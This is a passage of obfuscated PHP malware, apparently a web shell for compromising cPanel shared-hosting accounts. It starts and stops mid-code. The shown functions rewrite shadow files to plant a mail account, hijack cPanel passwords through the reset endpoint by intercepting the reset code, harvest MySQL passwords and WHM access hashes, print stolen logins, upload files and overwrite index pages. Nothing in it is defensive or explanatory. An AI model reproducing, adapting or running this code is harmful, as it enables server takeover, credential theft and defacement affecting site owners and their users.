$sD1Ai); } return $QhsyF; } function Pw_dW($rm7Yy, $Lipgx) { $uiCJi = 0; $Wu7is = ufeqC($rm7Yy); $LSeh6 = explode($GLOBALS[ð][0x1], $Wu7is); foreach ($LSeh6 as $Y0TMt) { if (strstr($Y0TMt, $Lipgx)) { $uiCJi++; } } return $uiCJi; } function PdwSI($rm7Yy, $Lipgx) { $h73NZ = PW_dw($rm7Yy, $Lipgx); $Wu7is = UFeqC($rm7Yy); $LSeh6 = explode($GLOBALS[ð][0x3], $Wu7is); $JOA3g = $GLOBALS[ð][0x2]; foreach ($LSeh6 as $Y0TMt) { if (strstr($Y0TMt, $Lipgx) || $h73NZ <= 0) { $h73NZ--; if ($h73NZ <= 0) { $JOA3g .= $Y0TMt . $GLOBALS[ð][0x1]; } } } return $JOA3g; } function MiASl($oxb9V, $sD1Ai) { if (function_exists($GLOBALS[ð][0x46])) { $QhsyF = file_put_contents($oxb9V, $sD1Ai, FILE_APPEND); } else { $QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x47]), $sD1Ai); } return $QhsyF; } function SmVyQ($O2ar5, $YFTnB = null, $wTxJW = null) { $wmx5s = curl_init(); curl_setopt($wmx5s, CURLOPT_URL, $O2ar5); curl_setopt($wmx5s, CURLOPT_HEADER, !0); curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1); curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, 0x1e); curl_setopt($wmx5s, CURLOPT_TIMEOUT, 0x1e); curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0x49]]); curl_setopt($wmx5s, CURLOPT_COOKIEFILE, $GLOBALS[ð][0x48]); curl_setopt($wmx5s, CURLOPT_COOKIEJAR, $GLOBALS[ð][0x4a]); if ($YFTnB != null) { curl_setopt($wmx5s, CURLOPT_HTTPHEADER, $YFTnB); } if ($wTxJW != null) { curl_setopt($wmx5s, CURLOPT_POST, 0x1); curl_setopt($wmx5s, CURLOPT_POSTFIELDS, $wTxJW); } $xM2hz = curl_exec($wmx5s); curl_close($wmx5s); return $xM2hz; } function fW1yE($W_j2r) { $QDTk7 = $GLOBALS[ð][0x2]; global $W6Z5Y; global $cnKIp; if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x225]) && function_exists($GLOBALS[ð][0x226])) { $QDTk7 = file_get_contents($W_j2r, !1, stream_context_create(array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x228] => $GLOBALS[ð][0x229], $GLOBALS[ð][0x22a] => $GLOBALS[ð][0x22b])))); file_get_contents($W6Z5Y . $GLOBALS[ð][0x22c], !1, stream_context_create(array($GLOBALS[ð][0x22d] => array($GLOBALS[ð][0x22e] => $GLOBALS[ð][0x22f], $GLOBALS[ð][0x230] => "Sec-Fetch-User: google.com")))); } if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x23b])) { $ituiK = curl_init(); curl_setopt($ituiK, CURLOPT_TIMEOUT, 0xa); curl_setopt($ituiK, CURLOPT_RETURNTRANSFER, !0); curl_setopt($ituiK, CURLOPT_URL, $W_j2r); curl_setopt($ituiK, CURLOPT_USERAGENT, $GLOBALS[ð][0x23d]); curl_setopt($ituiK, CURLOPT_FOLLOWLOCATION, !0); if (stristr($W_j2r, $GLOBALS[ð][0x23c])) { curl_setopt($ituiK, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ituiK, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($ituiK, CURLOPT_HEADER, !1); $QDTk7 = curl_exec($ituiK); curl_close($ituiK); } if (trim($QDTk7) == $GLOBALS[ð][0x2]) { $vuhmp = $GLOBALS[ð][0x240] . substr(str_shuffle($GLOBALS[ð][0x241]), 0x32) . $GLOBALS[ð][0x242]; A7GcN($GLOBALS[ð][0x23e] . $W_j2r . $GLOBALS[ð][0x23f] . $vuhmp); if (function_exists($GLOBALS[ð][0x243])) { $QDTk7 = file_get_contents($vuhmp); } else { $QDTk7 = stream_get_contents(fopen($vuhmp, $GLOBALS[ð][0x1d9])); } unlink($vuhmp); } if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x232]) && function_exists($GLOBALS[ð][0x233]) && function_exists($GLOBALS[ð][0x234])) { $dH1jj = fopen($W_j2r, $GLOBALS[ð][0x235], !1, stream_context_create(array($GLOBALS[ð][0x236] => array($GLOBALS[ð][0x237] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x239] => $GLOBALS[ð][0x23a])))); $QDTk7 = stream_get_contents($dH1jj); } return $QDTk7; } function wnEmP() { return substr(str_shuffle($GLOBALS[ð][0x198]), 0x19) . substr(str_shuffle($GLOBALS[ð][0x199]), 0x72); } function xfT4E($Ez2Fk) { $H1vRz = preg_match($GLOBALS[ð][0x1d2], $Ez2Fk); $bddTm = preg_match($GLOBALS[ð][0x1d3], $Ez2Fk); $Q8410 = preg_match($GLOBALS[ð][0x1d1], $Ez2Fk); $eBAYt = preg_match($GLOBALS[ð][0x1d0], $Ez2Fk); if (!$H1vRz || !$bddTm || !$Q8410 || !$eBAYt) { return !1; } return !0; } function cqxAS() { $Ez2Fk = wneMp(); $xHzJP = xfT4e($Ez2Fk); while ($xHzJP == !1) { $Ez2Fk = wnEMP(); $xHzJP = xFt4e($Ez2Fk); } return $Ez2Fk; } function r1U2D() { global $dr_Lq; global $t08MP; global $GEgR8; global $WnpSY; global $USGuv; $eRn5x = str_replace($GLOBALS[ð][0x53], $GLOBALS[ð][0x2], $USGuv); $c7ie0 = substr($eRn5x, 0, rand(0x3, strlen($eRn5x))); $sM8Cw = array($GLOBALS[ð][0x1fb], $GLOBALS[ð][0x1fc], $GLOBALS[ð][0x1fd], $GLOBALS[ð][0x1fe], $GLOBALS[ð][0x1ff], $GLOBALS[ð][0x200], $GLOBALS[ð][0x201], $GLOBALS[ð][0x202], $GLOBALS[ð][0x203], $GLOBALS[ð][0x204], $GLOBALS[ð][0x205], $GLOBALS[ð][0x206], $GLOBALS[ð][0x207], $GLOBALS[ð][0x208], $GLOBALS[ð][0x209], $GLOBALS[ð][0x20a], $GLOBALS[ð][0x20b], $GLOBALS[ð][0x20c], $GLOBALS[ð][0x20d], $GLOBALS[ð][0x20e], $GLOBALS[ð][0x20f], $GLOBALS[ð][0x210], $GLOBALS[ð][0x211], $GLOBALS[ð][0x212], $GLOBALS[ð][0x213], $GLOBALS[ð][0x214], $GLOBALS[ð][0x215], $GLOBALS[ð][0x216], $GLOBALS[ð][0x217], $GLOBALS[ð][0x218]); $GsCRR = array("info{$c7ie0}", "admin{$c7ie0}", "supervisor{$c7ie0}", "administrator{$c7ie0}", "contact{$c7ie0}", "call{$c7ie0}", "mail{$c7ie0}", "email{$c7ie0}", "support{$c7ie0}", "site{$c7ie0}", "website{$c7ie0}", "user{$c7ie0}", "director{$c7ie0}", "manager{$c7ie0}", "chief{$c7ie0}", "executive{$c7ie0}", "leader{$c7ie0}", "supports{$c7ie0}", "backing{$c7ie0}", "prop{$c7ie0}", "backup{$c7ie0}", "shore{$c7ie0}", "upholding{$c7ie0}", "help{$c7ie0}", "back-up{$c7ie0}", "host{$c7ie0}", "hosting{$c7ie0}", "clients{$c7ie0}", "client{$c7ie0}", "member{$c7ie0}"); $QoPM4 = kEOd4($sM8Cw); $qbUum = keoD4($GsCRR); array_push($qbUum, substr(str_shuffle($GLOBALS[ð][0x1f8]), 0x20) . $GLOBALS[ð][0x1f9]); $QMTXX = array_merge($QoPM4, $qbUum); $QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow"; $uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow"; $t08MP = $GLOBALS[ð][0x2]; if (file_exists($QQ8bf)) { $t08MP .= UFEqC($QQ8bf); } if (file_exists($uU2VV)) { $t08MP .= UFEQc($uU2VV); } foreach ($QMTXX as $stR_2) { if (!strstr($t08MP, $stR_2 . $GLOBALS[ð][0x7e])) { break; } } $tLGR8 = CqXas(); $ACEox = crypt($tLGR8, $GLOBALS[ð][0x1ef]); @mkdir("/home{$GEgR8}{$WnpSY}/etc"); @mkdir("/home{$GEgR8}{$WnpSY}/etc/{$USGuv}"); @mkdir("/home{$GEgR8}{$WnpSY}/mail"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Archive"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Drafts"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Sent"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.spam"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Trash"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/cur"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/tmp"); su59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-acl-list", $GLOBALS[ð][0x2]); su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidlist", $GLOBALS[ð][0x1f4]); sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity", $GLOBALS[ð][0x1fa]); Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity.5e196afc", $GLOBALS[ð][0x2]); SU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.index.log", $GLOBALS[ð][0x2]); sU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.list.index.log", $GLOBALS[ð][0x2]); Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.mailbox.log", $GLOBALS[ð][0x2]); SU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/maildirsize", $GLOBALS[ð][0x219]); sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/subscriptions", $GLOBALS[ð][0x1f3]); $GMTKc = $stR_2 . $GLOBALS[ð][0x7e] . $ACEox . $GLOBALS[ð][0x21a] . $GLOBALS[ð][0x21b]; if (file_exists($uU2VV)) { $Wu7is = $GLOBALS[ð][0x2]; $t08MP = UFEQC($uU2VV); if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) { $Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f2]; } $Wu7is .= $GMTKc; $Wu7is .= $t08MP; SU59q($uU2VV, $Wu7is); } if (file_exists($QQ8bf)) { $Wu7is = $GLOBALS[ð][0x2]; $t08MP = UFeQC($QQ8bf); if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) { $Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f5]; } $Wu7is .= $GMTKc; $Wu7is .= $t08MP; sU59Q($QQ8bf, $Wu7is); } else { $Wu7is = $GLOBALS[ð][0x2]; $t08MP = $GLOBALS[ð][0x2]; $Wu7is .= $GLOBALS[ð][0x1f6] . $USGuv . $GLOBALS[ð][0x1f7]; $Wu7is .= $GMTKc; su59Q($QQ8bf, $Wu7is); } $dr_Lq = "{$stR_2}@{$USGuv}|{$tLGR8}"; echo "<smtp><domain>Domian => {$USGuv}</domain><port><br>Port => 587</port><smtpname><br>SMTPname => {$stR_2}</smtpname><password><br>Password => {$tLGR8}</password></smtp><br>\n"; return $stR_2; } function Kenwx($WnpSY, $tLGR8) { global $e6zLE; $Sxpg6 = array($GLOBALS[ð][0x89] => $WnpSY, $GLOBALS[ð][0x8a] => $tLGR8, $GLOBALS[ð][0x8b] => $GLOBALS[ð][0x8c]); $D_ctQ = sMvYq($e6zLE . $GLOBALS[ð][0x8d], null, $Sxpg6); if (preg_match($GLOBALS[ð][0x86], $D_ctQ) || preg_match($GLOBALS[ð][0x87], $D_ctQ) || preg_match($GLOBALS[ð][0x88], $D_ctQ)) { return !0; } return !1; } function aUM2F() { global $USGuv; global $WnpSY; global $GEgR8; if (uFEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) { $EKHbT = UFEQc("/home{$GEgR8}{$WnpSY}/.my.cnf"); preg_match($GLOBALS[ð][0x1b9], $EKHbT, $QObCn); preg_match($GLOBALS[ð][0x1b8], $EKHbT, $jPaTv); if (preg_match($GLOBALS[ð][0x1b7], $EKHbT)) { if (!empty($QObCn[0x1])) { $kLoFX = $QObCn[0x1]; } elseif (!empty($jPaTv[0x1])) { $kLoFX = $jPaTv[0x1]; } if (isset($kLoFX)) { if (kenwX($WnpSY, $kLoFX) == !0) { echo "\n<br><cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kLoFX}</cpanel>"; } } } } } function rrMp2($my6fw) { global $WnpSY; global $GEgR8; global $e6zLE; global $t08MP; SU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw); su59q("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo", $GLOBALS[ð][0x2f] . $my6fw); $DInZ0 = array($GLOBALS[ð][0x3b] => $WnpSY, $GLOBALS[ð][0x3c] => $GLOBALS[ð][0x3d]); $D_ctQ = sMvYQ("{$e6zLE}/resetpass", null, $DInZ0); if (preg_match($GLOBALS[ð][0x30], $D_ctQ)) { if (isset($t08MP)) { f6uQd(); } aum2f(); unlink($GLOBALS[ð][0x32]); die($GLOBALS[ð][0x31]); } $IQVSV = array($GLOBALS[ð][0x33] => $GLOBALS[ð][0x34], $GLOBALS[ð][0x35] => $WnpSY, $GLOBALS[ð][0x36] => $my6fw, $GLOBALS[ð][0x37] => $GLOBALS[ð][0x2], $GLOBALS[ð][0x38] => $my6fw, $GLOBALS[ð][0x39] => $GLOBALS[ð][0x3a]); $BZKHp = smvYQ("{$e6zLE}/resetpass", null, $IQVSV); if (preg_match($GLOBALS[ð][0x3e], $BZKHp)) { unlink("/home{$GEgR8}{$WnpSY}/.contactemail"); unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo"); sU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw); chmod("/home{$GEgR8}{$WnpSY}/.contactemail", 0600); $BZKHp = sMvYq("{$e6zLE}/resetpass", null, $IQVSV); } if (preg_match($GLOBALS[ð][0x2e], $BZKHp)) { return !1; } return !0; } function i7GRf($e20Gs) { sleep(0x7); $Z3hyF = 0; $M34yy = scandir($e20Gs); foreach ($M34yy as $FcCNX) { if ($FcCNX != $GLOBALS[ð][0xd1] && $FcCNX != $GLOBALS[ð][0xd2] && $FcCNX != $GLOBALS[ð][0xd3]) { $Z3hyF++; $DBsEl = ufeQC($e20Gs . $GLOBALS[ð][0x85] . $FcCNX); if (preg_match($GLOBALS[ð][0xd4], $DBsEl, $bjkID)) { $SSP9u = $bjkID[0x1]; } } } if (empty($SSP9u) && $Z3hyF > 0) { global $dr_Lq; global $IyBvl; $dr_Lq = explode($GLOBALS[ð][0xc0], $dr_Lq); $my6fw = $dr_Lq[0]; $tLGR8 = $dr_Lq[0x1]; $Bbpdj = array($GLOBALS[ð][0xcd] => $my6fw, $GLOBALS[ð][0xce] => $tLGR8, $GLOBALS[ð][0xcf] => $GLOBALS[ð][0xd0]); $nAXqQ = sMVyq("{$IyBvl}/login/", null, $Bbpdj); if (preg_match($GLOBALS[ð][0xc1], $nAXqQ)) { if (preg_match($GLOBALS[ð][0xc2], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc3], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc4], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc5], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc6], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc7], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc8], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } else { aUM2F(); f6uqd(); unlink($GLOBALS[ð][0xca]); die($GLOBALS[ð][0xc9]); } $UwF6G = SMvYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/"); $dVuXE = smVYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=1&_action=show"); if (preg_match($GLOBALS[ð][0xcb], $dVuXE, $bjkID)) { $SSP9u = $bjkID[0x1]; } else { $dVuXE = SMVYq("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=2&_action=show"); if (preg_match($GLOBALS[ð][0xcc], $dVuXE, $bjkID)) { $SSP9u = $bjkID[0x1]; } } } } if (empty($SSP9u)) { AUM2f(); f6Uqd(); unlink($GLOBALS[ð][0xd6]); die($GLOBALS[ð][0xd5]); } return $SSP9u; } function Gh_rF($e20Gs = null) { global $WnpSY; global $USGuv; global $e6zLE; if ($e20Gs == null) { $SSP9u = trim($_POST[$GLOBALS[ð][0xbf]]); } else { $SSP9u = i7gRF($e20Gs); } $PJswN = array($GLOBALS[ð][0xb1] => $WnpSY, $GLOBALS[ð][0xb2] => $GLOBALS[ð][0xb3], $GLOBALS[ð][0xb4] => $GLOBALS[ð][0x2], $GLOBALS[ð][0xb5] => $SSP9u); $DZZzM = SmVyq("{$e6zLE}/resetpass", null, $PJswN); $kpaoN = cQXaS(); $su69k = array($GLOBALS[ð][0xb6] => $GLOBALS[ð][0xb7], $GLOBALS[ð][0xb8] => $WnpSY, $GLOBALS[ð][0xb9] => $kpaoN, $GLOBALS[ð][0xba] => $GLOBALS[ð][0xbb], $GLOBALS[ð][0xbc] => $GLOBALS[ð][0xbd], $GLOBALS[ð][0xbe] => $kpaoN); $gZVpq = SMvyq("{$e6zLE}/resetpass", null, $su69k); echo "<cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kpaoN}</cpanel><br>\n"; } function j91UX($stR_2 = null) { global $GEgR8; global $WnpSY; global $USGuv; if (isset($_POST[$GLOBALS[ð][0x28]])) { rrMp2(trim($_POST[$GLOBALS[ð][0x29]])); exit(0); } elseif (isset($_POST[$GLOBALS[ð][0x2a]])) { gh_Rf(); unlink("/home{$GEgR8}{$WnpSY}/.contactemail"); unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo"); unlink($GLOBALS[ð][0x2b]); exit(0); } if (rrmp2("{$stR_2}@{$USGuv}") == !1) { aum2f(); f6Uqd(); unlink($GLOBALS[ð][0x2c]); die($GLOBALS[ð][0x2d]); } Gh_rf("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new"); f6UqD(); } function F6UQd() { global $t08MP; global $GEgR8; global $WnpSY; global $USGuv; $QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow"; $uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow"; sU59q($QQ8bf, $t08MP); Su59Q($uU2VV, $t08MP); chmod($QQ8bf, 0640); chmod($uU2VV, 0640); unlink("/home{$GEgR8}{$WnpSY}/.contactemail"); unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo"); } function UhztB($jpODZ) { global $FDWty; if (isset($_POST[$GLOBALS[ð][0x267]])) { rename(trim($_POST[$GLOBALS[ð][0x268]]), trim($_POST[$GLOBALS[ð][0x269]])); $i83r4 = trim($_POST[$GLOBALS[ð][0x26b]]); $cHB_F = PDWSI($i83r4, $GLOBALS[ð][0x26a]); chmod($i83r4, 0644); su59Q($i83r4, $cHB_F); exit; } $AX0EH = $_FILES[$GLOBALS[ð][0x265]][$GLOBALS[ð][0x274]]; if ($jpODZ == 0x1) { $u3Q11 = $FDWty . $_FILES[$GLOBALS[ð][0x26d]][$GLOBALS[ð][0x26e]]; } elseif ($jpODZ == 0x2) { $ya3mT = substr(str_shuffle($GLOBALS[ð][0x26f]), 0x2d); mkdir($ya3mT); sU59Q($ya3mT . $GLOBALS[ð][0x270], $GLOBALS[ð][0x271]); $u3Q11 = $ya3mT . $GLOBALS[ð][0x105] . $_FILES[$GLOBALS[ð][0x264]][$GLOBALS[ð][0x26e]]; } else { $u3Q11 = $_FILES[$GLOBALS[ð][0x272]][$GLOBALS[ð][0x273]]; } $kUkI7 = move_uploaded_file($AX0EH, $u3Q11); if (!$kUkI7) { $kUkI7 = copy($AX0EH, $u3Q11); } if ($kUkI7) { echo "<successfully>Uploaded successfully.</successfully>"; if ($jpODZ == 0x2) { echo "<br><folder>{$ya3mT}</folder>"; } } } function Wc4SH() { global $FDWty; $Etebm = $_POST[$GLOBALS[ð][0x21f]]; $CFDzr = 0; $Z0beW = array($FDWty . $GLOBALS[ð][0x21c], $FDWty . $GLOBALS[ð][0x21d], $FDWty . $GLOBALS[ð][0x21e]); foreach ($Z0beW as $oxb9V) { if (file_exists($oxb9V)) { $QCGIr = Su59q($oxb9V, $Etebm); if (!$QCGIr) { unlink($oxb9V); Su59q($oxb9V, $Etebm); } $CFDzr = 0x1; } } if ($CFDzr == 0) { foreach ($Z0beW as $oxb9V) { sU59q($oxb9V, $Etebm); } } echo "./Done"; } function ZX3AV($WnpSY, $vfUVq) { global $hEUZd; $vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq); $VmjkA = array("Authorization:WHM {$WnpSY}:{$vfUVq}"); $D_ctQ = SMvyQ($hEUZd . $GLOBALS[ð][0x90], $VmjkA, null); if (preg_match($GLOBALS[ð][0x8e], $D_ctQ) || preg_match($GLOBALS[ð][0x8f], $D_ctQ)) { return !0; } return !1; } function rsq3X() { global $WnpSY; global $GEgR8; if (uFEQc($GLOBALS[ð][0x244])) { $ILX08 = uFeqc($GLOBALS[ð][0x245]); $ILX08 = explode($GLOBALS[ð][0x1], trim($ILX08)); foreach ($ILX08 as $MocnV) { $c7ie0 = explode($GLOBALS[ð][0x7e], $MocnV); $c7ie0 = $c7ie0[0]; if (uFeqc("/home{$GEgR8}{$c7ie0}/.accesshash")) { $vfUVq = UFEQc("/home{$GEgR8}{$c7ie0}/.accesshash"); $vfUVq = str_replace($GLOBALS[ð][0x3], $GLOBALS[ð][0x2], $vfUVq); if (ZX3aV($c7ie0, $vfUVq) == !0) { echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n"; } } } } if (UFeQc("/home{$GEgR8}{$WnpSY}/.accesshash")) { $vfUVq = ufEqc("/home{$GEgR8}{$WnpSY}/.accesshash"); $vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq); if (ZX3av($WnpSY, $vfUVq) == !0) { echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n"; } } else { unlink("/home{$GEgR8}{$WnpSY}/.accesshash"); $LUpGY = substr(str_shuffle($GLOBALS[ð][0x248]), 0x3); Su59Q("/home{$GEgR8}{$WnpSY}/.accesshash", $LUpGY); chmod("/home{$GEgR8}{$WnpSY}/.accesshash", 0600); if (Zx3av($WnpSY, $vfUVq) == !0) { echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n"; } else { unlink("/home{$GEgR8}{$WnpSY}/.accesshash"); } } } function SWRgg() { global $WnpSY; global $GEgR8; if (UFEQc($GLOBALS[ð][0x4e])) { $MULSm = Ufeqc($GLOBALS[ð][0x51]); $MULSm = explode($GLOBALS[ð][0x3], trim($MULSm)); foreach ($MULSm as $MocnV) { $c7ie0 = explode($GLOBALS[ð][0x4f], $MocnV); $c7ie0 = $c7ie0[0]; if (UFeqc("/home{$GEgR8}{$c7ie0}/.my.cnf")) { echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>"; } } } elseif (UfEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) { echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>"; } } function UgUZa() { global $XG7BU; $kX5Kz = $GLOBALS[ð][0x4b] . $XG7BU; $aMb4b = fW1Ye($kX5Kz); $hs4Qn = json_decode($aMb4b)->{$GLOBALS[ð][0x4d]}; $Qczmw = json_decode($aMb4b)->{$GLOBALS[ð][0x4c]}; return array($hs4Qn, $Qczmw); } function YdVh6($jpODZ) { global $ACEox; global $GEgR8; global $WnpSY; global $XG7BU; global $USGuv; $Z3hyF = 0; echo "<ip>{$XG7BU}</ip>"; if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) { $rm7Yy = uFEqC($GLOBALS[ð][0x221]); if (!$rm7Yy) { echo "<error># can't ReaD -> [ /etc/named.conf ]</error>"; } preg_match_all($GLOBALS[ð][0x223], $rm7Yy, $zXPiY); $AnvGa = array_unique($zXPiY[0x1]); foreach ($AnvGa as $eRn5x) { $Z3hyF++; if ($jpODZ == 0x1) { echo "{$eRn5x}\n"; } } } elseif (preg_match("/{$USGuv}/", $ACEox)) { preg_match("#/(.*)\\/{$USGuv}/#", $ACEox, $SrYD9); $SrYD9 = $GLOBALS[ð][0x85] . $SrYD9[0x1]; $AnvGa = a7gCn("ls {$SrYD9} | grep '\\.'"); $hWl0Q = explode($GLOBALS[ð][0x3], $AnvGa); foreach ($hWl0Q as $eRn5x) { if (is_file($SrYD9 . $GLOBALS[ð][0x85] . $eRn5x)) { continue; } $Z3hyF++; if ($jpODZ == 0x1) { echo "{$eRn5x}\n"; } } if (!$AnvGa) { $AnvGa = scandir($SrYD9); foreach ($AnvGa as $eRn5x) { if (is_file($SrYD9 . $GLOBALS[ð][0x105] . $eRn5x) || !strstr($eRn5x, $GLOBALS[ð][0xd1])) { continue; } $Z3hyF++; if ($jpODZ == 0x1) { echo "{$eRn5x}\n"; } } } } else { echo "<error>can't get domains.</error>"; } return $Z3hyF; } function U0TK3() { global $x3Uog; global $ACEox; global $GEgR8; global $WnpSY; global $USGuv; global $XG7BU; $GYhUj = uGuZA(); echo $GLOBALS[ð][0x60] . phpversion() . $GLOBALS[ð][0x61]; echo $GLOBALS[ð][0x6d] . $USGuv . $GLOBALS[ð][0x6e]; echo $GLOBALS[ð][0x5a] . $XG7BU . $GLOBALS[ð][0x5b]; echo $GLOBALS[ð][0x5e] . $x3Uog . $GLOBALS[ð][0x5f]; echo $GLOBALS[ð][0x6f] . $ACEox . $GLOBALS[ð][0x70]; echo $GLOBALS[ð][0x64] . $GYhUj[0] . $GLOBALS[ð][0x65]; echo $GLOBALS[ð][0x5c] . $GYhUj[0x1] . $GLOBALS[ð][0x5d]; echo $GLOBALS[ð][0x62] . ydVh6(0) . $GLOBALS[ð][0x63]; if (preg_match($GLOBALS[ð][0x6a], $x3Uog)) { echo "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>"; } else { echo "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>"; } if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) { echo "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>"; } elseif (preg_match($GLOBALS[ð][0x67], $ACEox)) { echo "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>"; } else { echo "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>"; } } function emGki($QmcTU) { $mH9bZ = array($GLOBALS[ð][0x19c] => $GLOBALS[ð][0x47], $GLOBALS[ð][0x19d] => $GLOBALS[ð][0x19e], $GLOBALS[ð][0x19f] => $GLOBALS[ð][0x1a0], $GLOBALS[ð][0x1a1] => $GLOBALS[ð][0x1a2], $GLOBALS[ð][0x1a3] => $GLOBALS[ð][0x1a4], $GLOBALS[ð][0x1a5] => $GLOBALS[ð][0x1a6], $GLOBALS[ð][0x1a7] => $GLOBALS[ð][0x1a8], $GLOBALS[ð][0x1a9] => $GLOBALS[ð][0x1aa], $GLOBALS[ð][0x1ab] => $GLOBALS[ð][0x1ac], $GLOBALS[ð][0x1ad] => $GLOBALS[ð][0x1ae], $GLOBALS[ð][0x1a0] => $GLOBALS[ð][0x1a3], $GLOBALS[ð][0x1aa] => $GLOBALS[ð][0x19d], $GLOBALS[ð][0x1af] => $GLOBALS[ð][0x1a1], $GLOBALS[ð][0x1a6] => $GLOBALS[ð][0x1b0], $GLOBALS[ð][0x1b1] => $GLOBALS[ð][0x1b2], $GLOBALS[ð][0x1b3] => $GLOBALS[ð][0x1b4], $GLOBALS[ð][0x1ac] => $GLOBALS[ð][0x1b5]); $D6mgj = str_split($QmcTU); $e50EE = $GLOBALS[ð][0x2]; foreach ($D6mgj as $wOVBe) { if (in_array($wOVBe, $mH9bZ)) { $e50EE .= $mH9bZ[$wOVBe]; } else { $e50EE .= $wOVBe; } } return $e50EE; } function bWQLE() { $qdMec = 0; $ogEo3 = 0; $ubZRU = 0; $yp2PP = 0; $BU0zm = 0; $lQymy = 0; $LOmS0 = trim($_POST[$GLOBALS[ð][0x191]]); $Enic4 = fW1ye($LOmS0); if (preg_match($GLOBALS[ð][0x106], $Enic4)) { preg_match_all($GLOBALS[ð][0x107], $Enic4, $WHqbk); foreach ($WHqbk[0x1] as $Teaxm) { 